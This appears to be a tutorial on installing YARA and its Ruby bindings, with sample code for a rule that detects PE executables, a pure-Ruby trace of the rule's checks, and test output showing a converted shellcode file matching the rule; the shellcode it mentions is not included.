YARA is a tool aimed at helping malware researchers to identify and classify malware samples. With YARA you can create descriptions of malware families based on textual or binary patterns contained on samples of those families. Each description consists of a set of strings and a Boolean expression which determines its logic. (Source: http://code.google.com/p/yara-project/)
Installation
Start by installing Ruby, RubyGems and PCRE, which YARA needs to build:
yum install ruby ruby-devel rubygems pcre pcre-devel
Download and install YARA
wget http://yara-project.googlecode.com/files/yara-1.6.tar.gz
tar -xvf yara-1.6.tar.gz
cd yara-1.6
./configure
make
sudo make install
Install yara-ruby
gem install yara
Note: If you get an error such as "yada yada libyara.so.0: cannot open shared object file: No such file or directory yada yada" when you run your yara Ruby application, add /usr/local/lib to the loader configuration and refresh the cache. The append has to run as root too, so pipe through tee instead of redirecting (a plain "sudo echo ... >> file" runs the redirect as the unprivileged user):
echo "/usr/local/lib" | sudo tee -a /etc/ld.so.conf
sudo ldconfig
Code
This is sample code from yara-ruby that compiles and tests a PE rule.
#!/usr/bin/env ruby
#
# Usage example:
# ruby ispe.rb /win_c/windows/system32/*.???
#
# yara-ruby - Ruby bindings for the yara malware analysis library.
# Eric Monti
# Copyright (C) 2011 Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Make the gem's lib/ directory visible when run from the examples tree.
$: << File.join(File.dirname(__FILE__), '..', 'lib')
require 'rubygems'
require 'yara'

# Compile a single rule: "MZ" at offset 0 and the "PE\0\0" signature at the
# offset stored in the DOS header's e_lfanew field (offset 0x3C).
ctx = Yara::Rules.new
ctx.compile_string "rule IsPE { condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 }"

# Scan each file named on the command line and report every rule that matched.
ARGV.each do |fname|
  ctx.scan_file(fname).each { |match| puts ">> #{fname} matched #{match.rule} rule" }
end
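To show what the IsPE condition actually checks, here is an added example (my own code, not from yara-ruby or the YARA project) that re-implements the rule's two reads in plain Ruby on constructed byte strings, so it runs without the yara gem. It assumes YARA's semantics that uint16/uint32 reads are little-endian and that a read past the end of the file makes the condition undefined, hence no match; is_pe? mirrors that by returning false.

```ruby
# Added example, not part of yara-ruby: the IsPE rule traced in pure Ruby.
# YARA's uint16(0) and uint32(uint32(0x3C)) are little-endian reads; an
# out-of-range read is undefined and an undefined condition never matches.

# Little-endian reads that return nil when the offset runs past the buffer,
# standing in for YARA's "undefined" value.
def uint16(data, off)
  return nil if off.nil? || off < 0 || off + 2 > data.bytesize
  data.byteslice(off, 2).unpack1('v')
end

def uint32(data, off)
  return nil if off.nil? || off < 0 || off + 4 > data.bytesize
  data.byteslice(off, 4).unpack1('V')
end

# Same logic as: condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550
def is_pe?(data)
  mz = uint16(data, 0)
  return false if mz.nil? || mz != 0x5A4D        # "MZ" DOS header magic
  e_lfanew = uint32(data, 0x3C)                   # offset of the PE header
  sig = uint32(data, e_lfanew)
  !sig.nil? && sig == 0x00004550                  # "PE\0\0"
end

# Constructed sample: a 64-byte DOS header whose e_lfanew points at offset 0x40,
# followed by the PE signature. Not a real executable, just enough for the rule.
def sample_pe
  hdr = "MZ".b + ("\x00".b * 0x3A) + [0x40].pack('V')
  hdr + "PE\x00\x00".b + ("\x00".b * 4)
end

# Edge cases the rule also has to get right (constructed inputs).
def sample_mz_only
  "MZ".b + ("\x00".b * 0x3E) + "XX".b              # MZ magic, no PE signature
end

def sample_dangling_e_lfanew
  "MZ".b + ("\x00".b * 0x3A) + [0x1000].pack('V')  # e_lfanew past end of file
end

if __FILE__ == $0
  { 'pe' => sample_pe, 'mz_only' => sample_mz_only, 'dangling' => sample_dangling_e_lfanew }.each do |name, bytes|
    puts ">> #{name} #{is_pe?(bytes) ? 'matched' : 'did not match'} IsPE rule"
  end
end
```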
Shellcode
Below is the sample shellcode we'll use to test the PE rule above. You can convert the shellcode to an exe at this website: http://sandsprite.com/shellcode_2_exe.php
Testing
With the code and shellcode above, we can test the IsPE rule as a proof of concept of how YARA classifies a file from a given rule:
[azizan@lab69 yara]# ruby test.rb shellcode.exe_
>> shellcode.exe_ matched IsPE rule
[azizan@lab69 yara]#
Credit:
- http://code.google.com/p/yara-project/
- https://github.com/SpiderLabs/yara-ruby